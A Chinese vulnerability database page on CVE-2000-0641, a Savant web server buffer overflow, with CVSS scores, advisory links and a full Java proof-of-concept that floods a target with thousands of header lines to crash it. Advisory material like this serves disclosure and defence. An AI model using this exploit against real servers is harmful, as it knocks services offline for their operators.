CVE-2000-0641
CVSS7.5
发布时间 :2000-07-08 00:00:00
修订时间 :2008-09-05 16:21:31
NMCOE    

[原文]Savant web server allows remote attackers to execute arbitrary commands via a long GET request.


[CNNVD]Savant web服务器任意命令执行漏洞(CNNVD-200007-017)

        Savant web服务器存在漏洞。远程攻击者可以借助超长GET请求来执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0641
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0641
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-017
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/4901.php
(VENDOR_ADVISORY)  XF  savant-get-bo
http://www.securityfocus.com/bid/1453
(VENDOR_ADVISORY)  BID  1453
http://archives.neohapsis.com/archives/bugtraq/2000-07/0114.html
(VENDOR_ADVISORY)  BUGTRAQ  20000708 gnu-pop3d (FTGate problem), Savant Webserver, Guild FTPd

- 漏洞信息

Savant web服务器任意命令执行漏洞
高危 未知
2000-07-08 00:00:00 2005-05-02 00:00:00
远程  
        Savant web服务器存在漏洞。远程攻击者可以借助超长GET请求来执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20066)

Michael Lamont Savant WebServer 2.1/3.0 Buffer Overflow Vulnerability (EDBID:20066)
windows remote
2000-07-03 Verified
0 Wizdumb
N/A [点击下载]
source: http://www.securityfocus.com/bid/1453/info

A buffer overflow exists in the Savant Web Server. It is possible to exploit this overflow by sending an unusually long GET request to the server.


/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
 * Written by Wizdumb <wizdumb@leet.org || www.mdma.za.net/fk>
 *
 * The overflow occurs when the server recieves too many headers in the GET
 * request. The results of the attack look something like...
 *
 * SAVANT caused an invalid page fault
 * in module KERNEL32.DLL at 015f:bff87eb5.
 *
 * Registers:
 *
 * EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
 * EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
 * ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
 * EDX=bff76859 ES=0167 EDI=010a020c GS=0000
 *
 * Bytes at CS:EIP:
 * 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
 *
 * Stack dump:
 *
 * Enjoy!
 * Andrew Lewis aka. Wizdumb [03/07/2000]
 */

import java.io.*;
import java.net.*;

class savantstack {

 public static void main(String[] args) throws IOException {
   
   if (args.length != 1) {
     System.out.println("Syntax: java savantstack [hostname/ip]");
     System.exit(1); }
   
   Socket soq = null;
   PrintWriter white = null;
   
   int i = 5000; // This should do fine :-)
   
   soq = new Socket(args[0], 80);
   white = new PrintWriter(soq.getOutputStream(), true);
   
   System.out.print("Showing " + args[0] + " the phj33r :P ...");
   white.print("GET /index.html HTTP/1.0");
   for (int x = 0; x < i; x++) white.println("A:A");
   white.println("\n");
   System.out.println("Done!");
   
   white.close();
   soq.close(); } }
		

- 漏洞信息

1456
Savant Web Server GET Request Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

A remote overflow exists in Savanta Web Server. The application fails to perform proper bounds checking resulting in a buffer overflow. By sending an overly long GET request with 260 bytes or more, a remote attacker can cause the application to crash resulting in a loss of availability.

- 时间线

2000-06-08 Unknow
2000-06-08 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站